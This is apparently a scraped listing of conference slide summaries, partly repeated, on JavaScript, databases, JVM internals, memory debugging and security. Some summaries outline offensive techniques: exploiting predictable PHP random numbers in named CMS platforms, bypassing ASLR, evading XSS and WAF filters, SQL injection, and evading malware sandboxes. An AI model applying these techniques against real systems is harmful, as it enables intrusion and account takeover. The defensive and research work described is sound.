The document discusses techniques for detecting heap spraying attacks at runtime using a tool called Nozzle. Nozzle analyzes heap objects to determine if they resemble NOP sleds used in heap spraying attacks. It calculates the "surface area" and normalized attack surface of objects to determine how likely an object is to be used in a spraying attack. Nozzle was able to detect real exploits with no false positives or negatives, though it incurred around 5-10% runtime overhead when sampling was used. The data collected by Nozzle could then be used for further analysis of malware behavior.
You may all know that JSON is a subset of JavaScript, but... Did you know that HTML5 implements NoSQL databases? Did you know that JavaScript was recommended for REST by Roy T. Fielding himself? Did you know that map & reduce are part of the native JavaScript API? Did you know that most NoSQL solutions integrate a JavaScript engine? CouchDB, MongoDB, WakandaDB, ArangoDB, OrientDB, Riak.... And when they don't, they have a shell client which does...
The story of NoSQL and JavaScript goes beyond your expectations and open more opportunities than you might imagine... What better match could you find than a flexible and dynamic language for schemaless databases? Isn't, an event-driven language what you were waiting for to manage eventually consistency? When NoSQL doesn't come to JavaScript, JavaScript comes to NoSQL, and does it very well...
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
This document provides a history and overview of server-side JavaScript. It discusses the birth of JavaScript in 1995 and key developments through 2011, including the emergence of Node.js and other platforms that enabled JavaScript to be used for server-side applications. Examples of companies using server-side JavaScript in production are provided, such as Demandware, Neolane, MTV, Voxer, and Happy Meeple. Benchmarks of different JavaScript engines and platforms are also referenced.
There is hardly a Senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless the warnings of removal from future JDK releases? Are there any safe alternatives to private API or is it absolutely vital? We will review the typical cases when Java developers prefer to go unsafe and discuss major benefits and the drawbacks of it. The report will be supported by the real examples from OK.RU experience.
Intravert Server side processing for CassandraEdward Capriolo
The document provides examples of using CQL (Cassandra Query Language) to create and query tables in Cassandra. It shows how to create tables to store user and video data, insert sample records, and perform queries. It then discusses using the IntraVert library to execute more complex queries directly against Cassandra, such as joins, filters, and multi-table operations, in order to reduce network traffic and processing compared to doing everything on the client side.
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
Stack traces and heap dumps are not just debugging tools; they open a doorway to the very heart of the Java Virtual Machine. This session is focused on peculiarities of JDK somehow related to heap walking and thread stacks.
• How to create dump in production without side effects?
• What is the performance impact of stack traces?
• How do jmap and jstack work under the hood, and what is special about 'forced' mode?
• Why do all profilers lie, and how to deal with it?
• How to scan heap using JVMTI?
The presentation supported by the live demos will address all these questions. It will also introduce new Java 9 Stack-Walking API (JEP 259) and reveal some useful but little known features of HotSpot JVM.
Conf soat tests_unitaires_Mockito_jUnit_170113SOAT
Vous subissez les régressions à chaque livraison ? Vous ne voyez pas l’intérêt des tests unitaires car ils ne servent qu’à tester des additions ? Si c’est le cas, suivez David dans la quête du Test Driven Development. Nous rencontrerons pléthore d'ennemies contre lesquels nous aurons à combattre : bugs, complexité, code statique, couplage fort. Ils essaieront de nous barrer la route, mais heureusement, nous pourrons compter sur nos alliés jUnit, Mockito, refactoring et injection/dépendance
Reutov, yunusov, nagibin random numbers take iiDefconRussia
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Writing native bindings to node.js in C++nsm.nikhil
The document provides an overview of how to build a C/C++ link to the V8 JavaScript engine and Node.js in order to use C/C++ libraries and functions in Node.js. It discusses topics like initializing V8, handling handles, injecting primitives, defining functions and objects, adding methods, asynchronous I/O, and linking external libraries. Code examples are provided for basic functions, objects, inheritance using ObjectWrap, and asynchronous functions.
You may all know that JSON is a subset of JavaScript, but... Did you know that HTML5 implements NoSQL databases? Did you know that JavaScript was recommended for REST by Roy T. Fielding himself? Did you know that map & reduce are part of the native JavaScript API? Did you know that most NoSQL solutions integrate a JavaScript engine? CouchDB, MongoDB, WakandaDB, ArangoDB, OrientDB, Riak.... And when they don't, they have a shell client which does...
The story of NoSQL and JavaScript goes beyond your expectations and open more opportunities than you might imagine... What better match could you find than a flexible and dynamic language for schemaless databases? Isn't, an event-driven language what you were waiting for to manage eventually consistency? When NoSQL doesn't come to JavaScript, JavaScript comes to NoSQL, and does it very well...
State of the art - server side JavaScript - web-5 2012Alexandre Morgaut
This document provides a history and overview of server-side JavaScript. It discusses the birth of JavaScript in 1995 and key developments through 2011, including the emergence of Node.js and other platforms that enabled JavaScript to be used for server-side applications. Examples of companies using server-side JavaScript in production are provided, such as Demandware, Neolane, MTV, Voxer, and Happy Meeple. Benchmarks of different JavaScript engines and platforms are also referenced.
There is hardly a Senior Java developer who has never heard of sun.misc.Unsafe. Though it has always been a private API intended for JDK internal use only, the popularity of Unsafe has grown too fast, and now it is used in many open-source projects. OK.RU is not an exception: its software also heavily relies on Unsafe APIs.
During this session we'll try to understand what is so attractive about Unsafe. Why do people keep using it regardless the warnings of removal from future JDK releases? Are there any safe alternatives to private API or is it absolutely vital? We will review the typical cases when Java developers prefer to go unsafe and discuss major benefits and the drawbacks of it. The report will be supported by the real examples from OK.RU experience.
Intravert Server side processing for CassandraEdward Capriolo
The document provides examples of using CQL (Cassandra Query Language) to create and query tables in Cassandra. It shows how to create tables to store user and video data, insert sample records, and perform queries. It then discusses using the IntraVert library to execute more complex queries directly against Cassandra, such as joins, filters, and multi-table operations, in order to reduce network traffic and processing compared to doing everything on the client side.
Everything you wanted to know about Stack Traces and Heap DumpsAndrei Pangin
Stack traces and heap dumps are not just debugging tools; they open a doorway to the very heart of the Java Virtual Machine. This session is focused on peculiarities of JDK somehow related to heap walking and thread stacks.
• How to create dump in production without side effects?
• What is the performance impact of stack traces?
• How do jmap and jstack work under the hood, and what is special about 'forced' mode?
• Why do all profilers lie, and how to deal with it?
• How to scan heap using JVMTI?
The presentation supported by the live demos will address all these questions. It will also introduce new Java 9 Stack-Walking API (JEP 259) and reveal some useful but little known features of HotSpot JVM.
Conf soat tests_unitaires_Mockito_jUnit_170113SOAT
Vous subissez les régressions à chaque livraison ? Vous ne voyez pas l’intérêt des tests unitaires car ils ne servent qu’à tester des additions ? Si c’est le cas, suivez David dans la quête du Test Driven Development. Nous rencontrerons pléthore d'ennemies contre lesquels nous aurons à combattre : bugs, complexité, code statique, couplage fort. Ils essaieront de nous barrer la route, mais heureusement, nous pourrons compter sur nos alliés jUnit, Mockito, refactoring et injection/dépendance
Reutov, yunusov, nagibin random numbers take iiDefconRussia
The document discusses vulnerabilities in random number generation in PHP. It summarizes several vulnerabilities discovered between 2008-2012 related to predictable random numbers generated by PHP functions like mt_rand(). It also discusses how PHP developers have been slow to address these issues. The document then provides step-by-step explanations of how to exploit vulnerabilities in four different CMS platforms - OpenCart, DataLife Engine, UMI.CMS, and OpenCart again - by predicting random values used for tasks like password resets and session IDs.
Writing native bindings to node.js in C++nsm.nikhil
The document provides an overview of how to build a C/C++ link to the V8 JavaScript engine and Node.js in order to use C/C++ libraries and functions in Node.js. It discusses topics like initializing V8, handling handles, injecting primitives, defining functions and objects, adding methods, asynchronous I/O, and linking external libraries. Code examples are provided for basic functions, objects, inheritance using ObjectWrap, and asynchronous functions.
The Ring programming language version 1.8 book - Part 105 of 202Mahmoud Samir Fayed
This document provides documentation on Qt classes related to networking, OpenGL, and other topics. It includes summaries of classes like QNetworkAccessManager for network requests, QOpenGLContext for OpenGL context handling, and QObject as the base class. For each class it lists the class parameters, parent class, and key methods.
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)James Clause
The document discusses advanced dynamic analysis techniques for leak detection. It describes how dynamic taint analysis works by assigning taint marks, propagating those marks, and checking the marks. This allows detecting where memory was allocated but not freed. The document outlines an implementation of leak detection as a Valgrind tool that intercepts memory functions and instruments instructions. It summarizes the current status of handling different languages and platforms. Future work ideas include improving the leakpoint tool and collaborating with Apple on new analysis techniques based on the experiences gained.
Vous subissez les régressions à chaque livraison ? Vous ne voyez pas l’intérêt des tests unitaires car ils ne servent qu’à tester des additions ? Les tests ne sont pas applicables à votre projet car il est trop complexe ? Si c’est le cas, suivez David dans la quête du Test Driven Development. Vous rencontrerez pléthore d’ennemies contre lesquels vous aurez à combattre : bugs, complexité, code statique, couplage fort. Ils essaieront de vous barrer la route, mais heureusement, vous pourrez compter sur vos alliés jUnit, Mockito, refactoring et injection/dépendance.
David finira la soirée par une démonstration pratique sur un exercice de refactoring.
A journey through the wonderful world of Node.js C++ addons. This talk was given at the September 8, 2015 NodeMN meetup.
Code: https://github.com/cb1kenobi/nodemn
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJSFestUA
Post-Mortem debugging is a really powerful technique that allows you, through the use of several tools, to take a memory dump when an issue occurs in your application and later analyze it offline.
The talk will primarily focus on llnode and how you can use this tool to better understand why a Node.js process is behaving odd or is crashing.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document discusses implementing new web APIs in Firefox. It outlines how to implement APIs in both JavaScript and C++. For JavaScript implementations, developers need to create interface definition files, manifest files, and JavaScript files. For C++ implementations, developers map interfaces to C++ classes and need to handle memory management using reference counting and the cycle collector. The document provides examples and recommends reaching out to Mozilla developers on IRC for help with implementations.
Kenneth Geisshirt gave a presentation on extending Node.js using C++. He covered why to write extensions in C++, demo C++ classes, building extensions, wrapping classes, methods, callbacks, exceptions, and more. The goal was to learn the basics of V8 internals, wrapping C++ classes, and writing an extension.
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsChristopher Batey
The document discusses testing Cassandra applications. It introduces Stubbed Cassandra, a tool that allows embedding a Cassandra server in unit tests to prime responses and verify queries. It can start multiple instances in a test, prime different result types, and verify connections and prepared statements. Example tests show how to test queries, errors, retries, and slow connections. Future features may include loading schemas and simulating multiple nodes.
Sandboxie process isolation with kernel hooksKarlFrank99
Sandboxie is a process isolation sandbox that controls access to kernel resources and window messages. It uses kernel drivers to hook important kernel objects and APIs to restrict access for sandboxed processes. The driver intercepts attempts by sandboxed processes to access resources and redirects them to secure driver interfaces. The driver also hooks window message APIs in win32k.sys to filter messages from sandboxed applications to other processes. This allows sandboxed processes to run in a restricted environment isolated from the rest of the system.
The document discusses best practices for managing memory in Android applications to avoid memory leaks and performance issues. It provides 3 key points:
1. Be aware of how memory is managed in Android and the garbage collection process. Allocations during critical parts like onDraw can cause stutters.
2. Learn techniques to detect memory issues like using LeakCanary, tracking allocations, and dumping the heap. Understanding memory profiles of an app is important.
3. Apply best practices like avoiding long-lived references to activities, using WeakReferences for inner classes, and cleaning up resources on stop to prevent leaks and improve performance. Memory management is important for smooth experiences.
The document discusses reconsidering design patterns and some of their common criticisms. It argues that overuse of patterns can lead to problems like hidden coupling and lack of flexibility. It also discusses alternatives to traditional patterns that allow for easier testing, evolution and flexibility through approaches like dependency injection, composition over inheritance, and separating behavior from structure using strategies. Overall it advocates an approach that focuses on communication, flexibility and reducing coupling rather than rigidly applying patterns as templates.
Spinning locks use busy waiting to synchronize tasks, while blocking locks allow tasks to block instead of spin. The document discusses different types of locks including spin locks, mutex locks, and owner locks. It provides examples of how these locks can be implemented and used to synchronize access to shared resources.
This document provides an overview of moving from C++ to Objective-C. It discusses key differences in syntax between the two languages, including differences in class and method declarations. It also covers Objective-C specific topics like protocols, properties, memory management using retain/release, and the role of the NSAutoreleasePool in autoreleasing objects. The document is intended to act as a bridge for developers familiar with C++ to understand fundamental concepts for working with Objective-C.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
MongoDB is easy to download and run locally but requires some thought and further understanding when deploying to production. At scale, schema design, indexes and query patterns really matter. So does data structure on disk, sharding, replication and data centre awareness. This talk will examine these factors in the context of analytics, and more generally, to help you optimise MongoDB for any scale.
Presented at MongoDB Days London 2013 by David Mytton.
This document discusses two approaches for connecting Node.js applications to MySQL databases: 1) Using a JavaScript MySQL client library like mysql (node-mysql) and 2) Using a common relational database framework for Node.js connections called node-db (db-mysql). It provides instructions for installing db-mysql and an example of connecting to a database and running queries.
Cassandra is great but how do I test my application?Christopher Batey
The document discusses testing Cassandra applications and introduces Stubbed Cassandra, a tool for testing Cassandra drivers. Stubbed Cassandra allows priming a fake Cassandra server to return expected responses or errors. It can be used to test failure scenarios, edge cases, and retry policies. The tool has Java and REST APIs and makes it possible to quickly test Cassandra applications in a deterministic and non-brittle way.
The Ring programming language version 1.8 book - Part 105 of 202Mahmoud Samir Fayed
This document provides documentation on Qt classes related to networking, OpenGL, and other topics. It includes summaries of classes like QNetworkAccessManager for network requests, QOpenGLContext for OpenGL context handling, and QObject as the base class. For each class it lists the class parameters, parent class, and key methods.
Advanced Dynamic Analysis for Leak Detection (Apple Internship 2008)James Clause
The document discusses advanced dynamic analysis techniques for leak detection. It describes how dynamic taint analysis works by assigning taint marks, propagating those marks, and checking the marks. This allows detecting where memory was allocated but not freed. The document outlines an implementation of leak detection as a Valgrind tool that intercepts memory functions and instruments instructions. It summarizes the current status of handling different languages and platforms. Future work ideas include improving the leakpoint tool and collaborating with Apple on new analysis techniques based on the experiences gained.
Vous subissez les régressions à chaque livraison ? Vous ne voyez pas l’intérêt des tests unitaires car ils ne servent qu’à tester des additions ? Les tests ne sont pas applicables à votre projet car il est trop complexe ? Si c’est le cas, suivez David dans la quête du Test Driven Development. Vous rencontrerez pléthore d’ennemies contre lesquels vous aurez à combattre : bugs, complexité, code statique, couplage fort. Ils essaieront de vous barrer la route, mais heureusement, vous pourrez compter sur vos alliés jUnit, Mockito, refactoring et injection/dépendance.
David finira la soirée par une démonstration pratique sur un exercice de refactoring.
A journey through the wonderful world of Node.js C++ addons. This talk was given at the September 8, 2015 NodeMN meetup.
Code: https://github.com/cb1kenobi/nodemn
JS Fest 2019. Thomas Watson. Post-Mortem Debugging in Node.jsJSFestUA
Post-Mortem debugging is a really powerful technique that allows you, through the use of several tools, to take a memory dump when an issue occurs in your application and later analyze it offline.
The talk will primarily focus on llnode and how you can use this tool to better understand why a Node.js process is behaving odd or is crashing.
The document discusses crash-resistance in software and how it can be exploited. It explains how exceptions generated by crashes in callback functions in Windows are handled, allowing programs to continue running despite crashes. This crash-resistance property is demonstrated through a simple example program. The document then discusses how crash-resistant probing of memory can be used to bypass defenses like ASLR by scanning process memory from a web worker without crashing the browser. Techniques like heap spraying and type confusion are used to craft fake objects and scan memory in a crash-resistant manner to discover information like the TEB and DLL base addresses.
The document discusses implementing new web APIs in Firefox. It outlines how to implement APIs in both JavaScript and C++. For JavaScript implementations, developers need to create interface definition files, manifest files, and JavaScript files. For C++ implementations, developers map interfaces to C++ classes and need to handle memory management using reference counting and the cycle collector. The document provides examples and recommends reaching out to Mozilla developers on IRC for help with implementations.
Kenneth Geisshirt gave a presentation on extending Node.js using C++. He covered why to write extensions in C++, demo C++ classes, building extensions, wrapping classes, methods, callbacks, exceptions, and more. The goal was to learn the basics of V8 internals, wrapping C++ classes, and writing an extension.
Cassandra Summit EU 2014 - Testing Cassandra ApplicationsChristopher Batey
The document discusses testing Cassandra applications. It introduces Stubbed Cassandra, a tool that allows embedding a Cassandra server in unit tests to prime responses and verify queries. It can start multiple instances in a test, prime different result types, and verify connections and prepared statements. Example tests show how to test queries, errors, retries, and slow connections. Future features may include loading schemas and simulating multiple nodes.
Sandboxie process isolation with kernel hooksKarlFrank99
Sandboxie is a process isolation sandbox that controls access to kernel resources and window messages. It uses kernel drivers to hook important kernel objects and APIs to restrict access for sandboxed processes. The driver intercepts attempts by sandboxed processes to access resources and redirects them to secure driver interfaces. The driver also hooks window message APIs in win32k.sys to filter messages from sandboxed applications to other processes. This allows sandboxed processes to run in a restricted environment isolated from the rest of the system.
The document discusses best practices for managing memory in Android applications to avoid memory leaks and performance issues. It provides 3 key points:
1. Be aware of how memory is managed in Android and the garbage collection process. Allocations during critical parts like onDraw can cause stutters.
2. Learn techniques to detect memory issues like using LeakCanary, tracking allocations, and dumping the heap. Understanding memory profiles of an app is important.
3. Apply best practices like avoiding long-lived references to activities, using WeakReferences for inner classes, and cleaning up resources on stop to prevent leaks and improve performance. Memory management is important for smooth experiences.
The document discusses reconsidering design patterns and some of their common criticisms. It argues that overuse of patterns can lead to problems like hidden coupling and lack of flexibility. It also discusses alternatives to traditional patterns that allow for easier testing, evolution and flexibility through approaches like dependency injection, composition over inheritance, and separating behavior from structure using strategies. Overall it advocates an approach that focuses on communication, flexibility and reducing coupling rather than rigidly applying patterns as templates.
Spinning locks use busy waiting to synchronize tasks, while blocking locks allow tasks to block instead of spin. The document discusses different types of locks including spin locks, mutex locks, and owner locks. It provides examples of how these locks can be implemented and used to synchronize access to shared resources.
This document provides an overview of moving from C++ to Objective-C. It discusses key differences in syntax between the two languages, including differences in class and method declarations. It also covers Objective-C specific topics like protocols, properties, memory management using retain/release, and the role of the NSAutoreleasePool in autoreleasing objects. The document is intended to act as a bridge for developers familiar with C++ to understand fundamental concepts for working with Objective-C.
XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors can be built and more complex payloads to evade filters and WAFs. In these slides, cool techniques to bypass them are described, from HTML to javascript. See also http://brutelogic.com.br/blog
MongoDB: Optimising for Performance, Scale & AnalyticsServer Density
MongoDB is easy to download and run locally but requires some thought and further understanding when deploying to production. At scale, schema design, indexes and query patterns really matter. So does data structure on disk, sharding, replication and data centre awareness. This talk will examine these factors in the context of analytics, and more generally, to help you optimise MongoDB for any scale.
Presented at MongoDB Days London 2013 by David Mytton.
This document discusses two approaches for connecting Node.js applications to MySQL databases: 1) Using a JavaScript MySQL client library like mysql (node-mysql) and 2) Using a common relational database framework for Node.js connections called node-db (db-mysql). It provides instructions for installing db-mysql and an example of connecting to a database and running queries.
Cassandra is great but how do I test my application?Christopher Batey
The document discusses testing Cassandra applications and introduces Stubbed Cassandra, a tool for testing Cassandra drivers. Stubbed Cassandra allows priming a fake Cassandra server to return expected responses or errors. It can be used to test failure scenarios, edge cases, and retry policies. The tool has Java and REST APIs and makes it possible to quickly test Cassandra applications in a deterministic and non-brittle way.
This document discusses automated verification of security policies in mobile code. It motivates the need for formal methods to specify and verify mobile distributed systems focusing on security issues. The objectives are to expressively specify mobile systems with explicit thread locations and location networks, and formally analyze mobile systems through model checking of security and safety properties. The outline presents preliminaries on mobile code languages and verification techniques like software model checking. It proposes modeling mobile systems with location-aware threads as labeled Kripke structures. The framework allows specifying security policies and model checking programs to verify properties in an abstraction-based manner.
This document outlines a lecture on deadlock detection for concurrent message-passing programs modeled as finite state machines. It discusses modeling programs as labeled transition systems, parallel composition of state machines, conditions for deadlock, and an approach for deadlock detection using automated abstraction and iterative abstraction refinement. Conservative abstraction is used to over-approximate the behavior of the concrete system to detect potential deadlocks, and counterexamples from abstract analysis are validated on the concrete system to guide refinement of the abstraction.
20101017 program analysis_for_security_livshits_lecture03_securityComputer Science Club
This document provides an introduction to system security. It defines security as ensuring a system does not fail in undesirable ways if an attacker supplies unexpected input. The goals of an attacker are discussed as well as common security properties like confidentiality, integrity, and availability. An overview of different types of attacks is presented such as network attacks, web attacks, and operating system attacks. Current trends in security vulnerabilities and exploits are covered like the rise of malware and botnets. Finally, examples of specific vulnerability classes like buffer overflows, format string vulnerabilities, SQL injection, and cross-site scripting are explained at a high level.
This document discusses various tools for analyzing JavaScript performance. It introduces Kojak, a tool for measuring JavaScript function performance, and jsPro, a visualization tool that works with Kojak. It provides instructions on how to use Kojak to track function call times and counts. It also explains how Kojak can be integrated with jsPro for online visualization of profiling data. Other profiling tools mentioned include Chrome Dev Tools, Google Analytics, AppDynamics, and PageSpeed Insights.
Nozzle: A Defense Against Heap-spraying Code Injection Attacksguest101353
This document discusses the "Nozzle" defense against heap-spraying code injection attacks. Nozzle is a runtime heap spraying detection tool that monitors memory allocation and deallocation APIs to analyze objects on the heap and calculate a "normalized surface area" metric to identify suspicious objects. It was found to effectively detect published heap spraying attacks with acceptable overhead when used in a web browser and Adobe Reader.
This document discusses various exploit techniques, mitigations against exploits, and ways to bypass mitigations. It covers popular exploitation methods like stack-based buffer overflows, heap overflows, and return-oriented programming (ROP). It also outlines key mitigations like stack cookies, data execution prevention (DEP), address space layout randomization (ASLR), and structured exception handler overwrite protection (SEHOP). Finally, it examines techniques for bypassing protections like avoiding ASLR, memory leaks to disclose addresses, and using ROP chains combined with memory leaks to bypass DEP and ASLR. The document provides a technical overview of the exploit-mitigation landscape.
Securing TodoMVC Using the Web Cryptography APIKevin Hakanson
The open source TodoMVC project implements a Todo application using popular JavaScript MV* frameworks. Some of the implementations add support for compile to JavaScript languages, module loaders and real time backends. This presentation will demonstrate a TodoMVC implementation which adds support for the forthcoming W3C Web Cryptography API, as well as review some key cryptographic concepts and definitions.
Instead of storing the Todo list as plaintext in localStorage, this "secure" TodoMVC implementation encrypts Todos using a password derived key. The PBKDF2 algorithm is used for the deriveKey operation, with getRandomValues generating a cryptographically random salt. The importKey method sets up usage of AES-CBC for both encrypt and decrypt operations. The final solution helps address item "A6-Sensitive Data Exposure" from the OWASP Top 10.
With the Web Cryptography API being a recommendation in 2014, any Q&A time will likely include browser implementations and limitations, and whether JavaScript cryptography adds any value.
Industroyer: biggest threat to industrial control systems since Stuxnet by An...CODE BLUE
Industroyer is the first ever malware specifically designed to attack power grids. This unique and extremely dangerous malware framework was involved in the December 2016 blackout in Ukraine. What sets Industroyer apart from other malware targeting infrastructure, such as BlackEnergy (a.k.a. SandWorm), is its ability to control switches and circuit breakers directly via 4 different industrial communication protocols.
In addition to explaining why Industroyer can be considered the biggest threat to industrial control systems since the infamous Stuxnet worm, we will take a look at the 2016 power outage in the context of the other numerous cyberattacks against Ukrainian critical infrastructure in the recent years.
As the protocols and hardware targeted by Industroyer are employed in power supply infrastructure, transportation control systems, and other critical infrastructure systems, like water and gas, worldwide, the malware can be re-purposed to target vital services in other countries. This discovery should serve as a wake-up call for those responsible for security of these critical systems.
Anton Cherepanov
Anton Cherepanov is currently working at ESET as Senior Malware Researcher; his responsibilities include the analysis of complex threats. He has done extensive research on cyber-attacks in Ukraine. His research was presented on numerous conferences, including Virus Bulletin, CARO Workshop, PHDays, and ZeroNights. His interests focus on reverse engineering and malware analysis automation.
Róbert Lipovský
Róbert Lipovský is Senior Malware Researcher in ESET’s Security Research Laboratory, with 10 years’ experience with malware research. He is responsible for malware intelligence and analysis and leads the Malware Research team in ESET’s HQ in Bratislava. He is a regular speaker at security conferences, including Black Hat, Virus Bulletin, and CARO. He runs a reverse engineering course at the Slovak University of Technology, his alma mater and the Comenius University. When not bound to a keyboard, he enjoys sports, playing guitar and flying an airplane.
HTML version: http://www.jure.it/demo/html5videofilters
Is 2014 too early for using HTML5 video filters? Let's do some experiments and exploring how to improve your javascript scripts' performances!
This document provides an overview of WebAssembly (WASM) and analyzes its attack surface. It begins with a brief history of WASM and describes its Minimum Viable Product (MVP) 1.0 specification, which defines its instruction set and file format. It then discusses WASM's implementation in web browsers and interaction with JavaScript, highlighting its potential attack surface. Examples of past vulnerabilities leveraging WASM are also provided, such as CVE-2017-5116 which used a race condition to redirect execution to attacker-controlled code. The document concludes by discussing the future of WASM and taking questions.
Script Fragmentation - Stephan Chenette - OWASP/RSA 2008Stephan Chenette
ERA 2008 - Stephan Chenette, Presentation on Script Fragmentation attack
Abstract: This presentation will introduce a new web-based attack vector which utilizes client-side scripting to fragment malicious web content.
This involves distributing web exploits in a asynchronous manner to evade signature detection. Similar to TCP fragmentation attacks, which are still an issue in current IDS/IPS products, This attack vector involves sending any web exploit in fragments and uses the already existing components within the web browser to reassemble and execute the exploit.
Our presentation will discuss this attack vector used to evade both gateway and client side detection. We will show several proof of concepts containing common readily available web exploits.
IstSec'14 - İbrahim BALİÇ - Automated Malware AnalysisBGA Cyber Security
The document discusses automating mobile malware analysis processes. It introduces the speaker as a security researcher who works on various online and offline projects related to mobile security. The rest of the document discusses standard processes for static and dynamic malware analysis, including decompiling APK files, disassembling codes, analyzing network activity, and using tools like emulator, adb, and strace. It emphasizes that automating these processes through scripting can help analyze malware more efficiently.
Mock what? What Mock?Learn What is Mocking, and how to use Mocking with ColdFusion testing, development, and continuous integration. Look at Mocking and Stubbing with a touch of Theory and a lot of Examples, including what you could test, and what you should test… and what you shouldn't test (but might be fun).
The document discusses the analysis of an attack involving a compromised website containing a PHP webshell. Additional artifacts found included an initial SQL injection, a China Chopper webshell, and a Golang-coded ss.exe backdoor. The attacker used a vulnerability in Sandboxie to evade detection and execute a debugsrv.exe trojan. Yara rules were provided to detect related malware samples. The investigation mapped the attacker's lateral movement and a remediation plan was implemented over 35 days.
A pragmatic approach to different SQL Injection techniques such as Stacked statements, Tautology based, Union based, Error based, Second Order and Blind SQL Injection coherently explaining the path behind these attacks including tips and tricks to make them more likely to work in real life.
Also I will show you ways to avoid weak defenses as black listing and quote filtering as well as how privilege escalation may take place from this sort of vulnerabilities.
There will be a live demonstration where you can catch on some handy tools and actually see blind sql injection working efficiently with the latest techniques showing you why this type of SQL injection shouldn't be taken any less seriously than any other.
Finally, a word on countermeasures and real solutions to prevent these attacks, what you should do and what you should not.
http://videos.sapo.pt/ZvwITnTBMzD8HYvEZrov (video)
Using Smalltalk for controlling robotics systemsSerge Stinckwich
This document discusses using Smalltalk for controlling robotics systems. It provides an introduction to developing embedded systems in Smalltalk and highlights some past projects that have used Smalltalk for robotics and embedded applications. It outlines advantages of Smalltalk such as its simple syntax, portability, uniformity, and dynamism. Examples are given of generating code from Smalltalk for other robotics platforms and simulating robotics applications in Smalltalk.
DrupalCamp London 2017 - Web site insecurity George Boobyer
Common threats to web security with real world case studies of compromised sites,
- A 'dissection' of a typical common exploit tool and how it operates,
- Simple approaches to mitigating common threats/vulnerabilities,
- Defence in depth – an overview of the various components of web security,
- Drupal specific measures that standard penetration testing often does not account for.
An overview of how to benefit from:
- Security monitoring and log analysis
- Intrusion Detection Systems & Firewalls
- Security headers and Content Security Policies (CSP).
see Drupal Camp London for full details:
http://drupalcamp.london/session/web-site-insecurity-how-your-cms-site-will-get-hacked-and-how-prevent-it
This document discusses how HTML5 can be used to build engaging mobile applications. Key features covered include offline storage using the Application Cache API, storing data locally using Web Storage, using a SQL database with Web SQL, advanced graphics capabilities with Canvas and SVG, real-time communications over WebSockets, and tools for developing HTML5 apps like jQuery Mobile, Sencha Touch, and Google Web Toolkit. It emphasizes testing on multiple platforms and browsers to ensure compatibility.
The document discusses cloud computing and infrastructure as code. It defines different cloud service models including IaaS, PaaS and SaaS. It discusses how tools like Chef, Puppet, jclouds and Deltacloud can be used to automate infrastructure provisioning and configuration. It also talks about how cloud computing together with devops practices like automation can enable faster and more flexible application deployments. Finally it discusses some open source cloud platforms like Eucalyptus and OpenStack and the future of cloud computing.
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
This document discusses techniques for detecting and evading malware analysis sandboxes. It begins by outlining common sandbox detection methods like checking screen resolution, installed software, CPU/system information, and network settings. It then discusses challenges like simulating sleep functions and network connections. The document emphasizes that while evading analysis is possible, manual review remains difficult to defeat. It concludes by advising blue teams to thoroughly test sandboxes and customize them to their environment before purchasing.
The document discusses Google's work on HTML5 and advancing web applications capabilities. It outlines how browsers and web technologies have evolved over time, from JavaScript in 1995 to the rise of AJAX in the mid-2000s. It then lists new capabilities web applications need like video playback, geolocation, offline support. Google's goal is to empower web apps to do what native apps can through new HTML5 features in Chrome like canvas, local storage, web workers and more. The document provides examples and demos of various HTML5 features and outlines Google's ongoing work to further web standards.
Similar to 20101017 program analysis_for_security_livshits_lecture04_nozzle (20)
The document discusses concurrency and synchronization in distributed computing. It provides an overview of Petr Kuznetsov's research at Telecom ParisTech, which includes algorithms and models for distributed systems. Some key points discussed are:
- Concurrency is important due to multi-core processors and distributed systems being everywhere. However, synchronization between concurrent processes introduces challenges.
- Common synchronization problems include mutual exclusion, readers-writers problems, and producer-consumer problems. Tools for synchronization include semaphores, transactional memory, and non-blocking algorithms.
- Characterizing distributed computing models and determining what problems can be solved in a given model is an important area of research, with implications for distributed system design.
The document discusses weakly supervised learning from video and images using convolutional neural networks. It describes using scripts as weak supervision for learning actions from movies without explicit labeling. Methods are presented for jointly learning actors and actions from scripts, and for action learning with ordering constraints. The use of CNNs for object and action recognition in images is also summarized, including work on training CNNs using only image-level labels without bounding boxes.
This document discusses common C++ bugs and tools to find them. It describes various types of memory access bugs like buffer overflows on the stack, heap, and globals that can lead to crashes or security vulnerabilities. Threading bugs like data races, deadlocks, and race conditions on object destruction are also covered. Other undefined behaviors like initialization order issues, lack of sequence points, and integer overflows are explained. The document provides examples of each type of bug and emphasizes that undefined behavior does not guarantee a predictable result. It concludes with a quiz to find bugs in a code sample and links to additional reading materials.
AddressSanitizer, ThreadSanitizer, and MemorySanitizer are compiler-based tools that detect bugs like buffer overflows, data races, and uninitialized memory reads in C/C++ programs. AddressSanitizer instruments loads and stores to detect out-of-bounds memory accesses. ThreadSanitizer intercepts synchronization calls to detect data races between threads. MemorySanitizer tracks initialized and uninitialized memory using shadow memory to find uses of uninitialized values. The tools have found thousands of bugs with low overhead. Future work includes supporting more platforms and languages and detecting additional bug classes.
